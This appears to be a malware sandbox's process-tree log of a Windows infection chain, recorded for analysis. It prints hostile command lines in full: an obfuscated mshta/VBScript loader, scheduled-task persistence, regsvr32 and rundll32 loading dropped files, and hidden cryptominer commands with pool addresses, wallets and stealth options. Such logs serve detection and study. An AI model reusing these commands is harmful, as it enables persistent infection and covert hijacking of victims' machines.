                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL"). Run ( "cmD.exe /Q /c TYPE ""C:\Users\Admin\Documents\zfDDj_YoaPcYIx61Slp4L_SJ.exe"" > X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if """" == """" for %A IN ( ""C:\Users\Admin\Documents\zfDDj_YoaPcYIx61Slp4L_SJ.exe"" ) do taskkill /f -im ""%~nxA"" " , 0 , trUE ) )
                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                      PID:5636
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\Documents\zfDDj_YoaPcYIx61Slp4L_SJ.exe"> X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if "" == "" for %A IN ( "C:\Users\Admin\Documents\zfDDj_YoaPcYIx61Slp4L_SJ.exe" ) do taskkill /f -im "%~nxA"
                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                          PID:4440
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                            taskkill /f -im "zfDDj_YoaPcYIx61Slp4L_SJ.exe"
                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                            PID:1712
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE
                                                                                                                                                                                                                            X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV
                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                              PID:5528
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL"). Run ( "cmD.exe /Q /c TYPE ""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" > X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if ""-PXPoqL0iOUHHP7hXFattB5ZvsV "" == """" for %A IN ( ""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" ) do taskkill /f -im ""%~nxA"" " , 0 , trUE ) )
                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                  PID:2308
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"> X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if "-PXPoqL0iOUHHP7hXFattB5ZvsV " == "" for %A IN ( "C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE" ) do taskkill /f -im "%~nxA"
                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                      PID:5512
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\regsvr32.exe" -S fOUT6o7J.Mj
                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                      PID:3660
                                                                                                                                                                                                                            • C:\Users\Admin\Documents\kdXdvFyBFdY8SDR_XaeO6RAG.exe
                                                                                                                                                                                                                              "C:\Users\Admin\Documents\kdXdvFyBFdY8SDR_XaeO6RAG.exe"
                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                PID:2516
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 280
                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                  PID:2912
                                                                                                                                                                                                                              • C:\Users\Admin\Documents\D7uC0vwU5ul0tBmSSwLjplsR.exe
                                                                                                                                                                                                                                "C:\Users\Admin\Documents\D7uC0vwU5ul0tBmSSwLjplsR.exe"
                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                  PID:3092
                                                                                                                                                                                                                                • C:\Users\Admin\Documents\XqmNJfDJTsp8mJTim1bQc5s5.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\XqmNJfDJTsp8mJTim1bQc5s5.exe"
                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                    PID:5944
                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\XqmNJfDJTsp8mJTim1bQc5s5.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\XqmNJfDJTsp8mJTim1bQc5s5.exe"
                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                        PID:5328
                                                                                                                                                                                                                                • C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe
                                                                                                                                                                                                                                  "C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:5700
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-5C8E7.tmp\stats.tmp
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-5C8E7.tmp\stats.tmp" /SL5="$302DA,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                    PID:5076
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-QSURR.tmp\Setup.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-QSURR.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                      PID:664
                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                          PID:4040
                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                            schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                            PID:4080
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                            PID:1900
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Services.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Services.exe"
                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                            PID:5260
                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                PID:5308
                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                  PID:2096
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                PID:3352
                                                                                                                                                                                                                                              • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                C:\Windows/System32\conhost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14444 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=60 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                  PID:2756
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Fri192902b3c24.exe
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                  PID:4948
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS00E08283\Fri192902b3c24.exe
                                                                                                                                                                                                                                    Fri192902b3c24.exe
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    PID:1180
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 300
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                      PID:5744
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Fri19d30056588.exe
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:4460
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS00E08283\Fri19d30056588.exe
                                                                                                                                                                                                                                      Fri19d30056588.exe
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                      PID:1880
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Fri19b9b73e83c948b1d.exe /mixone
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:4468
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS00E08283\Fri19b9b73e83c948b1d.exe
                                                                                                                                                                                                                                        Fri19b9b73e83c948b1d.exe /mixone
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:2580
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2580 -s 284
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                          PID:4168
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Fri1921f7a9d3.exe
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                      PID:428
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS00E08283\Fri1921f7a9d3.exe
                                                                                                                                                                                                                                        Fri1921f7a9d3.exe
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:1800
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Fri192f077acf656dd.exe
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:556
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS00E08283\Fri192f077acf656dd.exe
                                                                                                                                                                                                                                          Fri192f077acf656dd.exe
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          PID:2552
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                            PID:1656
                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                PID:1120
                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                  PID:5628
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                PID:1492
                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                    PID:3644
                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                      PID:1900
                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                    C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                      PID:784
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1.exe"
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                  PID:4136
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    PID:5524
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                  PID:5076
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\3.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\3.exe"
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                  PID:5144
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    PID:5508
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\4.exe"
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                  PID:5308
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\5.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\5.exe"
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                  PID:5476
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\6.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\6.exe"
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                  PID:5636
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\7.exe"
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                  PID:5828
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                  PID:4716
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Fri19870e2febf5544.exe
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:1064
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS00E08283\Fri19870e2febf5544.exe
                                                                                                                                                                                                                                                  Fri19870e2febf5544.exe
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  PID:2588
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 300
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                    PID:5536
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c Fri19ca03f05489b.exe
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:1196
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS00E08283\Fri19ca03f05489b.exe
                                                                                                                                                                                                                                                    Fri19ca03f05489b.exe
                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    PID:1956
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Fri19927b4fe38a9d1.exe
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:1344
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS00E08283\Fri19927b4fe38a9d1.exe
                                                                                                                                                                                                                                                      Fri19927b4fe38a9d1.exe
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      PID:4920
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4920 -s 312
                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                        PID:5840
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Fri191454c4b4.exe
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                    PID:4784
                                                                                                                                                                                                                                            • C:\Windows\System32\sihclient.exe
                                                                                                                                                                                                                                              C:\Windows\System32\sihclient.exe /cv hT4RkUrQU0KJr6hWfqbv1w.0.2
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                              PID:3832
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS00E08283\Fri191454c4b4.exe
                                                                                                                                                                                                                                              Fri191454c4b4.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                              PID:1456
                                                                                                                                                                                                                                              • C:\ProgramData\7225756.exe
                                                                                                                                                                                                                                                "C:\ProgramData\7225756.exe"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                PID:5560
                                                                                                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 5560 -s 2276
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                  PID:1068
                                                                                                                                                                                                                                              • C:\ProgramData\7264406.exe
                                                                                                                                                                                                                                                "C:\ProgramData\7264406.exe"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                                PID:5780
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  PID:6104
                                                                                                                                                                                                                                              • C:\ProgramData\3984969.exe
                                                                                                                                                                                                                                                "C:\ProgramData\3984969.exe"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                PID:5348
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 2424
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                  PID:5596
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2580 -ip 2580
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                              PID:2384
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1180 -ip 1180
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                              PID:5216
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2588 -ip 2588
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                              PID:5228
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4920 -ip 4920
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                              PID:5260
                                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -pss -s 580 -p 5076 -ip 5076
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                              PID:5704
                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                              PID:5848
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                PID:5904
                                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -pss -s 580 -p 5308 -ip 5308
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                              PID:6052
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5508 -ip 5508
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                              PID:6060
